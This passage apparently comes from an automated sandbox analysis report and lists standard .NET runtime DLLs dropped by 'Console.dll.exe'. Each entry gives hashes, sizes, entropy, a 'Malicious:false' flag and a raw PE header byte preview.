                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w(............" ..0..............*... ...@....... ..............................T.....`.................................a*..O....@...................)...`......x)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...T...#~......T...#Strings............#US.........#GUID...(.......#Blob......................3......................................M...............x.....3.....7.....^.......m.....m...I.f..._.m.....m.....m...w.m.....m.....m...G.m.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encodings.Web.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):125200
                                                                                                                                                                                                                        Entropy (8bit):6.279798424491634
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:kExhwB1//WYuFWH9JZ5N77iWU8NvScDfN:nMV/WYoWHTUWTQcDl
                                                                                                                                                                                                                        MD5:EE2F308E36A744AE3248C50B63820A85
                                                                                                                                                                                                                        SHA1:3230CCFA1A779BF354D8833C78551D043B3B572F
                                                                                                                                                                                                                        SHA-256:15A3081FDB9E35AD2DF9FD7E4578FBEF6457E8005A509AE80CE6B95CC7FB19DC
                                                                                                                                                                                                                        SHA-512:8AC6E91CBEAA3AA0AE7A6A70B24D0617CE0A9FEC8D70C1CA0129547EE60EC790A25DC42DBCBA0B25A6D2C8CCE26A783CAE104AC22B85AA643168A0884EA6A0A2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E..............!......... ....................@.......................................@..................................................)...........)..........,...p...............................................................H............text.............................. ..`.data...U...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Json.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1386656
                                                                                                                                                                                                                        Entropy (8bit):6.809172508654264
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:AysomuTlPXsI/Xp+iyhecuHnErxVqP7jxHNgn6fYSU5JRzMIS7bdpLHAUakopsRI:AysomuTlPXsQp+iyhesrxVqP7jxHNgnp
                                                                                                                                                                                                                        MD5:0111781B1E8446170C5174E8C6A4B5F5
                                                                                                                                                                                                                        SHA1:17F234E3BF28B21DB64DCDAEE26B697AE8971F0A
                                                                                                                                                                                                                        SHA-256:CCA1DC63F7F131AFDFB05C4F5F73EA8351DD00CFAC4598A97507E11EF7A28349
                                                                                                                                                                                                                        SHA-512:39F5D1B5D9A665694CE07ED0E18FCEF4E7D77D70C3F7E649A4C7E0015FCE871B409E6F8672814A2A7EEC6A0E02F1345FB9E849BB79279109FED3C2050881866B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................!.....0...................@....@.................................L.....@..................................................0..._.......(...P..(....R..p...............................................................H............text....'.......0.................. ..`.data........@.......@..............@....reloc..(....P.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.RegularExpressions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):960672
                                                                                                                                                                                                                        Entropy (8bit):6.913178427069684
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:eQfdlzs2CoG1XDainDiv67tAPehjbYYWN:FPs2pG1XDDivzehjsh
                                                                                                                                                                                                                        MD5:FE7F6C225F1E5196F1C576B6ADC35643
                                                                                                                                                                                                                        SHA1:4254AF22BFE9E098E511D1D289D5F0A53E07DE35
                                                                                                                                                                                                                        SHA-256:E54E3C8D79C7FB16B4F4654966F4051FC8C595324350FB5ADB8CB041986C8A60
                                                                                                                                                                                                                        SHA-512:07EF57471E560A755C1B029F04EDBD0F1093A0C8C6818D5D6E349BC414791C735AAFA950B5338AC7C0B2D1AE26F0BA6598D8BD93CAF3FE60019702DF67263878
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U..............!.........p....................@.......................................@.....................................................h,.......(.......x..d...p...............................................................H............text............................... ..`.data...............................@....reloc...x..........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Channels.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):121008
                                                                                                                                                                                                                        Entropy (8bit):6.537105065831165
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:elnskcEoWb5btU8xXjQS/FfktkUmOQu121bYb6/Q/WoioI2W+CSkBdz0PVzg:eBskxVJU8xTQSdqTQu1eM9/ri+WviNE
                                                                                                                                                                                                                        MD5:3093C1C78873DDEA6C43D53BAC0A508C
                                                                                                                                                                                                                        SHA1:37510C67AFF5B5009443124D7289820F9A2D1BD5
                                                                                                                                                                                                                        SHA-256:FCCB782B81D0CDFDB3DFB80CEEB09D5168D2AAF13CC01056A6ECF15F9E1EDA65
                                                                                                                                                                                                                        SHA-512:CB8BABED9B293BA7BF93BD257A188EEC942B432112E74EA5EABF922EE3F77FB72D872439F06F8B91E3B47B05FBC15A7EC4870C1D9BAB4921338DCA578D1645EE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+..............!.....p...0....................@..................................+....@..................................................).. ........(......X.......p...............................................................H............text...o`.......p.................. ..`.data............ ..................@....reloc..X...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Overlapped.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16144
                                                                                                                                                                                                                        Entropy (8bit):6.734673749439338
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:D7HYCH9McH6H8HiWdHWiITb2HRN7gokXC4deR9zZjmNoYv:DIyM/igokXC4dC9zZjyr
                                                                                                                                                                                                                        MD5:DD2B749B62FEAF27E7FC8A53D48434BE
                                                                                                                                                                                                                        SHA1:DBDEB033DC922552A96FC01EF516D1B0BF512AA0
                                                                                                                                                                                                                        SHA-256:891F99E9FB6E9EEADBBDE9E2427FB0C8015845692142DFFD734A54A137F3B67C
                                                                                                                                                                                                                        SHA-512:B250D81DB223906886DE4C6596D7CC3E7FB5B3D8C46482D1F2A4E3B3E733B89A46B7EF3AB91668A89DED791D0CDC8A742C3623D68966895F379AA8201BA4842D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a............"!..0..............*... ........@.. ...............................!....`.................................;*..P....@...................)...`......@)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p*......H........ ..p...................P .......................................!.^ti.H,.A...G%..E....0.]mh....X..8.(.._t...L.......YC.\..E....<..9hkJ.....................u((..O....;.>.++.7[..e......+BSJB............v4.0.30319......`.......#~..p...H...#Strings............#GUID...........#Blob......................3......................................................4...........7.......c...{.....V.............c...t.....}.................9.....................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Dataflow.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):440480
                                                                                                                                                                                                                        Entropy (8bit):6.759235530768213
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:+49d+3EQxigpk2WBeFYCF3Q5v31FMtkl9+X3NL5:+fUQxiCkVwYCF3Q5vlFjwX3NL5
                                                                                                                                                                                                                        MD5:4CA225E78BA0DC00D72A5392EBE6F96D
                                                                                                                                                                                                                        SHA1:27D2D620A80D882A8C2C3C93CE55615ECAA688D0
                                                                                                                                                                                                                        SHA-256:1EABDAF995193D555DBFB1AE86266EFBDD82BCC32B693A3AC291F5586D58B790
                                                                                                                                                                                                                        SHA-512:2553D23951D2F247E2B2AD308D4674C92F6E7C3D89E84795B9B874EF6690926FDBE3CF9B8C2CB5427E340E40438C586F6BF7F87668C8956403924DCA5AE6B733
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[.............!..............................@..................................r....@.............................................h....`..0........(...P...:..T"..p...........................................................h...H............text............................... ..`.data...`...........................@....reloc...:...P...@...P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Extensions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16144
                                                                                                                                                                                                                        Entropy (8bit):6.76460620009382
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:jCVT05B091ncmtYf9WHXWi9Tb2HRN7KaFDR9zkA4kVaxIq0:GVAMLh/ill9zkT5x0
                                                                                                                                                                                                                        MD5:5E3BC7138BE929AF431972E7EF5F0A1B
                                                                                                                                                                                                                        SHA1:80F26B43BFA71EB7507A017E81D40B4EDA616A0D
                                                                                                                                                                                                                        SHA-256:F70C53D6B7296311EF07958F1B075D263C48B80171E180EB3E0A1DDF218DCB34
                                                                                                                                                                                                                        SHA-512:80F7CD3AA84D687211696AB6FAA600252B25D5D16DDD9128EB666AE3906F9EA4CE354AA5D7C32ACAB8233FD4A1215A4A3621A398D2826527AAF34816DCE683D4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............" ..0.............V+... ...@....... ..............................%.....`..................................+..O....@...................)...`.......*..T............................................ ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................7+......H.......P ..0....................)......................................BSJB............v4.0.30319......l...d...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................s...............1...........A.......O.................................W...........1...................p...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Parallel.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):121008
                                                                                                                                                                                                                        Entropy (8bit):6.523929200857054
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:Q3k0+drhYnS+5PP3kg9nEkknrika2aLAO:t0+VhMP+1nr9JHO
                                                                                                                                                                                                                        MD5:1911D66F38C9139D325A5E5E867A84D0
                                                                                                                                                                                                                        SHA1:128958D196C220EE8E3ECE5251A5E81F7B974C8D
                                                                                                                                                                                                                        SHA-256:A0D526640D0E1A843C18EAC156CCF7543C141D6FB6B1D0310607AB3561493A24
                                                                                                                                                                                                                        SHA-512:2D19B777701DE8302589C70953152F11DA2C2372D92FF56D0BC38055F0BA5E3F0F3CB88B42A0F00ECAE125C3E92775FB252649FCE79C872BA9D98B3C0BF4AFCB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.............!.....p...0....................@..................................w....@..................................................)...........(..........0...p...............................................................H............text....g.......p.................. ..`.data............ ..................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17072
                                                                                                                                                                                                                        Entropy (8bit):6.604139664856258
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:Paf4fk3CBYroq8W9c9W2zWiS5kHRN7k49R9ze7y:Paf4B2roPbk69z0y
                                                                                                                                                                                                                        MD5:AB5E9DEC0432FC88EC08E0FF65E7C245
                                                                                                                                                                                                                        SHA1:CA0616BB4C0D72F312C2FDD347732B8C2AF0CC01
                                                                                                                                                                                                                        SHA-256:D14C966A42FE17A89ADF0575F97BD69E54B5D708F1D6E805273C2F39949E0E0C
                                                                                                                                                                                                                        SHA-512:464E3A46F56F35511D0175625A54AD7E3BFC6D93A1D27F4BA1696C8E38FB787AD8FAFB3C7989AB8D5FDDDC0CFE58D3EB950E84742D2C720F319452EBB558BBF5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f............" ..0..............-... ...@....... ..............................jY....`..................................-..O....@...................(...`.......,..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P ......................<,......................................BSJB............v4.0.30319......l.......#~......H...#Strings....X.......#US.\.......#GUID...l.......#Blob......................3................................&.................o...w.o...2.\.........].................H.....^.....-...........v.................F...................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V...y.V.......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Thread.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.764581916323156
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:gBz2EG0K89WJ7WiOMTb2HRN7EkUTNbZR9z3E4niM:gluT9/imTFT9z04iM
                                                                                                                                                                                                                        MD5:90ECF3FAD632B326A25725E3811FF3B7
                                                                                                                                                                                                                        SHA1:25B39EC0054FC320FEC2CD797575EB5D64CC8C95
                                                                                                                                                                                                                        SHA-256:3E6349495EF016EE4110C71D7BC49BA36E2459584B8EBA8F9D878D25EA4193F5
                                                                                                                                                                                                                        SHA-512:9BF3B67C3D8C150EF54A3B9697D801B174F23FEF922723A78ED8729C482C83320DED5D6E2F012FDA79D5910BA6F8F137D649E2EE5359EAF9FC84F680229AD557
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._............"!..0.............^+... ........@.. ....................................`..................................+..T....@...................)...`.......*..T............................................ ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@+......H........ ..D...................P .......................................F.............,....^5l\6.|/....jY.,......EwB.T.g.n.d..u..R.qb^.e*\\...;.....H.x..........t.v.F...E..s....z.....8BSJB............v4.0.30319......`...|...#~..........#Strings............#GUID...........#Blob......................3......................................].........U.@.....@...n.....`...........T.............y...0.!...9.!.................................u.............@...........

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.ThreadPool.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.704405184722677
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:Pi92K3cwuzWNvWip5kHRN7rqDX+iR9zXQCA:PapcGDuO9zK
                                                                                                                                                                                                                        MD5:0A5F765A271F5539E1F67D4835B2F20D
                                                                                                                                                                                                                        SHA1:6CE02C8875459B68DA4385EE6B587E025CE75CA8
                                                                                                                                                                                                                        SHA-256:A48AEAB2FA53408C27549C003E79D944F7E90AFAB5C65363DEBBC21AA6B7AE0E
                                                                                                                                                                                                                        SHA-512:FBED20D0F3FD49F0734DA2779F0AD1F19705E76C83EA3DDA36B8AC8786C090D957C257FD9BAC5D255DD787F14463950D1ADD9C3135E39D13656881373CCC649C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.@..........."!..0.............N*... ........@.. ....................................`..................................)..X....@...................(...`.......(..T............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0*......H........ ..(...................P .......................................3..@V..|.W:..P..f.&.C.ZA]#e.j.;k...lo._hE.c...;n<.....a^^UKeF...Up......qlE..S.M##B..6....o.1.....A.......U.....~..xR......LBSJB............v4.0.30319......`.......#~..`... ...#Strings............#GUID...........#Blob......................3......................................P.........7...........P...........{.....6...................................p.......................W.....d...................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Timer.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15624
                                                                                                                                                                                                                        Entropy (8bit):6.7727090069687295
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:CWF6doqcS1MWGCWiV6Tb2HRN71SpR9zNsb:4oz46/iMD9zib
                                                                                                                                                                                                                        MD5:AF90EBB4A6ACB74637FA4AEBA96530DD
                                                                                                                                                                                                                        SHA1:7F4BDF143487648F55A26ABBB3C93F569443B95E
                                                                                                                                                                                                                        SHA-256:AFE17D6E9AEE962A8BD0F7E152B5CD66F08F94A74C7D9197DBC91FE6135452A3
                                                                                                                                                                                                                        SHA-512:E6335AA7CD3C7F7C591A20B978D5FE83D9185348FC05F4B79950E1F30B2E2B4147F4906CE48C43B873CCE4FB387A24C1A7232F3BE9AC089AF948413E2F72547F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-..........." ..0.............")... ...@....... ....................................`..................................(..O....@...................)...`.......'..T............................................ ............... ..H............text...(.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ......................`'......................................BSJB............v4.0.30319......l.......#~......d...#Strings....|.......#US.........#GUID...........#Blob......................3..................................................3...x.3...3. ...S.....^.................I....._.................w.................G...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):80032
                                                                                                                                                                                                                        Entropy (8bit):6.099599506956179
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:AOPCVnBVZkRJhZ8j0+Ywdm35wK50Y8dGHJYijDBZzu:AOPCXOJhZ8j0+YwdmpwvY8dGHVbi
                                                                                                                                                                                                                        MD5:EF1D3CA8063F98CBF243DAB09FFFF101
                                                                                                                                                                                                                        SHA1:A7FEFB953810AE58D1F7E43E35B4EB1E55DD5FF0
                                                                                                                                                                                                                        SHA-256:547A49B3DF65B2ABE615848157F38E55D9BB3CF455C95858A3A90694816FE90D
                                                                                                                                                                                                                        SHA-512:991B5F653473334AB43F4F2DEF6B3979196EDCC4464E536326D7DEC9A34071BCF46A45DD09B7C2098B0A9B837733D1957AE641C31E22CF46999FCE753D37AF1E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!......... ....................@.................................-E....@.............................................`....!...........(..........T...p...........................................................`...H............text............................... ..`.data...............................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.Local.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):596128
                                                                                                                                                                                                                        Entropy (8bit):6.713874888224992
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:I8HskQUEJ+JlUFl6gnzVmTVmScPTGQdvko28vCyx:8PUEJ+JlUFlPzWESQzRCI
                                                                                                                                                                                                                        MD5:3860EBABEAE46BD0F5DB8DB571025706
                                                                                                                                                                                                                        SHA1:12B9BAD64D81D74C0C84A09219C14BABC2B0AE9D
                                                                                                                                                                                                                        SHA-256:14E128620A6FF217EE64469F601C22FBFDBA7864F65F218BB52E4668D196CDCC
                                                                                                                                                                                                                        SHA-512:CFBA3DE0E3D525513A4EC9C19170BF41652619EA816EC22D89C5259D9C12C76DE5E604F4ABC3EA65A94C3E9A848908DF4D0960FBB55D59883F3DA2719286D7FE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!g>............!..... ...................0....@.................................W.....@.................................................8u..@%.......(.......K...4..p...............................................................H............text...9........ .................. ..`.data....j...0...p...0..............@....reloc...K.......P..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16656
                                                                                                                                                                                                                        Entropy (8bit):6.7091506297092645
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:mmw3RHUNXWliWiuTb2HRN7dFDR9zkA4kuapi:mn3RHpp/iPl9zkTA4
                                                                                                                                                                                                                        MD5:E41BD9C8A75A72926047CA94E6602777
                                                                                                                                                                                                                        SHA1:F71D57C7E0EF0EA9F5A9F733A0AE68B9D0CE3C87
                                                                                                                                                                                                                        SHA-256:771534D2D592B514D1EB27B7B4A3F58169035188619A0A043B475332DE2F6F9B
                                                                                                                                                                                                                        SHA-512:00F8698180C59DA753BDA9806ECEE1E52EEC3A237C19631B79DD0A42DD613D8E7974E0417170E8619E06F012EE5020F2D956A7F5792ADB9E301C1F070F3F3858
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............-... ...@....... ...............................9....`..................................-..O....@..t................)...`.......,..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................-......H.......P ......................<,......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................$.....3.........0...........D...........o.....*.1.....1.....K.....1...i.1.....1.....1.....1...P.1...X.1.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........C.....L.....k...#.t...+.....+.....3.....;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ValueTuple.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15536
                                                                                                                                                                                                                        Entropy (8bit):6.793267071394761
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:36/hzUPCWVVWhWim7c3WT56Os1HnhWgN7agWfx14DoSJj+iX01k9z3AUQLC1C:K/hxWnGWiE5kHRN7DDX+iR9zXQ4C
                                                                                                                                                                                                                        MD5:C98F0478463362D42C1F5B16EDD0211A
                                                                                                                                                                                                                        SHA1:5C2D7E81F9DA28C39DFF742F1E9CF56F11B8AA72
                                                                                                                                                                                                                        SHA-256:27D377CF4D65DAEC44850C14E222844B6C42658D32537DEAC9C960B9AF8DBDC3
                                                                                                                                                                                                                        SHA-512:7355602E4E3D49D2FDB901FB3747D3AEABD3900FD1306B3F7EB758E253406970A207262BAC83C92D3169C89DA2E582B71A3FA9E818F75DAF1E2047224F761061
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$..........." ..0..............)... ...@....... ...............................=....`..................................)..O....@..d................(...`.......(..T............................................ ............... ..H............text........ ...................... ..`.rsrc...d....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................D(......................................BSJB............v4.0.30319......l...,...#~..........#Strings....d.......#US.h.......#GUID...x...|...#Blob......................3......................................E.......................z...........+.....b...Q.b.....[.....b.....b...4.b.....b.....b.....b.....b.....i...........t.....t.....t...).t...1.t...9.t...A.t...I.t...Q.t...Y.t...a.t...i.t...q.t...y.t.......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Web.HttpUtility.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):59552
                                                                                                                                                                                                                        Entropy (8bit):5.9170849619466805
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:y7b9FogqWx6zlV+5NHFQvHqb2QWMKmrmpaFAOM7gWs3fXfXSXEw/RXmic/iS/9zs:y7n4W5NHFs7mnmxWfvC/BSiSFz6d
                                                                                                                                                                                                                        MD5:266A13B1B1E56F76F989E1C6102BBABE
                                                                                                                                                                                                                        SHA1:131E75F167A116AE8BAE9C411C039BDB21CD7993
                                                                                                                                                                                                                        SHA-256:EC209E7FF24E19BB75830A510D0F8AEF532694196EFACC8AC1C3081CDFD96394
                                                                                                                                                                                                                        SHA-512:00BF962A2F88A36A191F4959176567058C705611B3D6D4C7BDC3DD63752F1598F183331F96C960374F2F39A37752CB5B4E06B8BBF5010E345398086762A6CB48
                                                                                                                                                                                                                        Malicious:false
